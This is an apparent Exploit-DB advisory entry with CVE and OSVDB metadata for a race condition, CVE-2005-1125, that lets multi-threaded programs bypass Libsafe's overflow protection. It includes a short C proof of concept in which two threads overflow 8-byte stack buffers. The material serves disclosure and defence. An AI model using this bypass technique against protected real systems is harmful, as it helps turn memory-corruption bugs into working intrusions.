Libsafe 2.0 Multi-threaded Process Race Condition Security Bypass Weakness
2005-04-15T00:00:00
ID EDB-ID:25429 Type exploitdb Reporter Overflow.pl Modified 2005-04-15T00:00:00
Description
Libsafe 2.0 Multi-threaded Process Race Condition Security Bypass Weakness. CVE-2005-1125. Dos exploit for linux platform
source: http://www.securityfocus.com/bid/13190/info
Libsafe will normally kill an application when certain types of memory corruption are detected, preventing exploitation of some buffer overflow and format string vulnerabilities. A weakness has been reported that may allow Libsafe security failsafe mechanisms to be bypassed.
This vulnerability is due to a race condition that may be exposed when Libsafe is used with multi-threaded applications. The result is that Libsafe security features may be bypassed and an attack that would ordinarily be prevented may succeed. It should be noted that this is an implementation error in Libsafe that does not present a security risk unless there is a memory corruption vulnerability in a multi-threaded application on an affected computer.
This issue was reported in Libsafe 2.0-16. Other versions may also be affected.
#include <pthread.h>
#include <stdio.h>
int ok = 0;
void *func1(void *none)
{
char buf[8];
while(1)
{
if(!ok)
continue;
strcpy(buf, "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA");
break;
}
puts("func1 overflow!");
}
void *func2(void *none)
{
char buf[8];
ok = 1;
strcpy(buf, "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA");
puts("func2 overflow!!");
}
int main()
{
pthread_t t1, t2;
pthread_create(&t1, NULL, &func1, NULL);
pthread_create(&t2, NULL, &func2, NULL);
pthread_join(t1, NULL);
pthread_join(t2, NULL);
return 0;
}
{"id": "EDB-ID:25429", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Libsafe 2.0 Multi-threaded Process Race Condition Security Bypass Weakness", "description": "Libsafe 2.0 Multi-threaded Process Race Condition Security Bypass Weakness. CVE-2005-1125. Dos exploit for linux platform", "published": "2005-04-15T00:00:00", "modified": "2005-04-15T00:00:00", "cvss": {"score": 5.1, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/25429/", "reporter": "Overflow.pl", "references": [], "cvelist": ["CVE-2005-1125"], "lastseen": "2016-02-03T01:21:10", "viewCount": 4, "enchantments": {"score": {"value": 5.8, "vector": "NONE", "modified": "2016-02-03T01:21:10", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2005-1125"]}, {"type": "osvdb", "idList": ["OSVDB:15646"]}], "modified": "2016-02-03T01:21:10", "rev": 2}, "vulnersScore": 5.8}, "sourceHref": "https://www.exploit-db.com/download/25429/", "sourceData": "source: http://www.securityfocus.com/bid/13190/info\r\n\r\nLibsafe will normally kill an application when certain types of memory corruption are detected, preventing exploitation of some buffer overflow and format string vulnerabilities. A weakness has been reported that may allow Libsafe security failsafe mechanisms to be bypassed.\r\n\r\nThis vulnerability is due to a race condition that may be exposed when Libsafe is used with multi-threaded applications. The result is that Libsafe security features may be bypassed and an attack that would ordinarily be prevented may succeed. It should be noted that this is an implementation error in Libsafe that does not present a security risk unless there is a memory corruption vulnerability in a multi-threaded application on an affected computer.\r\n\r\nThis issue was reported in Libsafe 2.0-16. Other versions may also be affected. \r\n\r\n#include <pthread.h>\r\n#include <stdio.h>\r\n\r\nint ok = 0;\r\n\r\nvoid *func1(void *none)\r\n{\r\n\tchar buf[8];\r\n\twhile(1)\r\n\t{\r\n\t\tif(!ok)\r\n\t\t\tcontinue;\r\n\t\tstrcpy(buf, \"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\");\r\n\t\tbreak;\r\n\t}\r\n\tputs(\"func1 overflow!\");\r\n}\r\n\r\nvoid *func2(void *none)\r\n{\r\n\tchar buf[8];\r\n\tok = 1;\r\n\tstrcpy(buf, \"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\");\r\n\tputs(\"func2 overflow!!\");\r\n}\r\n\r\nint main()\r\n{\r\n\tpthread_t t1, t2;\r\n\t\r\n\tpthread_create(&t1, NULL, &func1, NULL);\r\n\tpthread_create(&t2, NULL, &func2, NULL);\r\n\t\r\n\tpthread_join(t1, NULL);\r\n\tpthread_join(t2, NULL);\r\n\t\r\n\treturn 0;\r\n}\r\n", "osvdbidlist": ["15646"]}
{"cve": [{"lastseen": "2020-10-03T11:34:54", "description": "Race condition in libsafe 2.0.16 and earlier, when running in multi-threaded applications, allows attackers to bypass libsafe protection and exploit other vulnerabilities before the _libsafe_die function call is completed.", "edition": 3, "cvss3": {}, "published": "2005-05-02T04:00:00", "title": "CVE-2005-1125", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 5.1, "vectorString": "AV:N/AC:H/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2005-1125"], "modified": "2008-09-05T20:48:00", "cpe": ["cpe:/a:avaya:libsafe:2.0.13", "cpe:/a:avaya:libsafe:2.0.14", "cpe:/a:avaya:libsafe:2.0.12", "cpe:/a:avaya:libsafe:2.0.5", "cpe:/a:avaya:libsafe:2.0.16", "cpe:/a:avaya:libsafe:2.0.8", "cpe:/a:avaya:libsafe:2.0.3", "cpe:/a:avaya:libsafe:2.0.9", "cpe:/a:avaya:libsafe:2.0.6", "cpe:/a:avaya:libsafe:2.0.4", "cpe:/a:avaya:libsafe:2.0.7", "cpe:/a:avaya:libsafe:2.0.2", "cpe:/a:avaya:libsafe:2.0.1", "cpe:/a:avaya:libsafe:2.0.11", "cpe:/a:avaya:libsafe:2.0.10", "cpe:/a:avaya:libsafe:2.0.15"], "id": "CVE-2005-1125", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-1125", "cvss": {"score": 5.1, "vector": "AV:N/AC:H/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:avaya:libsafe:2.0.14:*:*:*:*:*:*:*", "cpe:2.3:a:avaya:libsafe:2.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:avaya:libsafe:2.0.11:*:*:*:*:*:*:*", "cpe:2.3:a:avaya:libsafe:2.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:avaya:libsafe:2.0.16:*:*:*:*:*:*:*", "cpe:2.3:a:avaya:libsafe:2.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:avaya:libsafe:2.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:avaya:libsafe:2.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:avaya:libsafe:2.0.12:*:*:*:*:*:*:*", "cpe:2.3:a:avaya:libsafe:2.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:avaya:libsafe:2.0.15:*:*:*:*:*:*:*", "cpe:2.3:a:avaya:libsafe:2.0.10:*:*:*:*:*:*:*", "cpe:2.3:a:avaya:libsafe:2.0.13:*:*:*:*:*:*:*", "cpe:2.3:a:avaya:libsafe:2.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:avaya:libsafe:2.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:avaya:libsafe:2.0.9:*:*:*:*:*:*:*"]}], "osvdb": [{"lastseen": "2017-04-28T13:20:11", "bulletinFamily": "software", "cvelist": ["CVE-2005-1125"], "edition": 1, "description": "## Vulnerability Description\nLibsafe contains a flaw that may allow a malicious user to bypass libsafe security mechanisms in a multi-threaded application linked against the vulnerable library. The issue is due to a race condition when processing simultaneous attacks in separated threads, resulting in a loss of integrity.\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nLibsafe contains a flaw that may allow a malicious user to bypass libsafe security mechanisms in a multi-threaded application linked against the vulnerable library. The issue is due to a race condition when processing simultaneous attacks in separated threads, resulting in a loss of integrity.\n## References:\nVendor URL: http://www.research.avayalabs.com/project/libsafe/\n[Secunia Advisory ID:14978](https://secuniaresearch.flexerasoftware.com/advisories/14978/)\nOther Advisory URL: http://www.overflow.pl/adv/libsafebypass.txt\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-04/0236.html\nISS X-Force ID: 20127\n[CVE-2005-1125](https://vulners.com/cve/CVE-2005-1125)\nBugtraq ID: 13190\n", "modified": "2005-04-15T10:55:17", "published": "2005-04-15T10:55:17", "href": "https://vulners.com/osvdb/OSVDB:15646", "id": "OSVDB:15646", "title": "libsafe Race Condition Protection Check Bypass", "type": "osvdb", "cvss": {"score": 5.1, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}
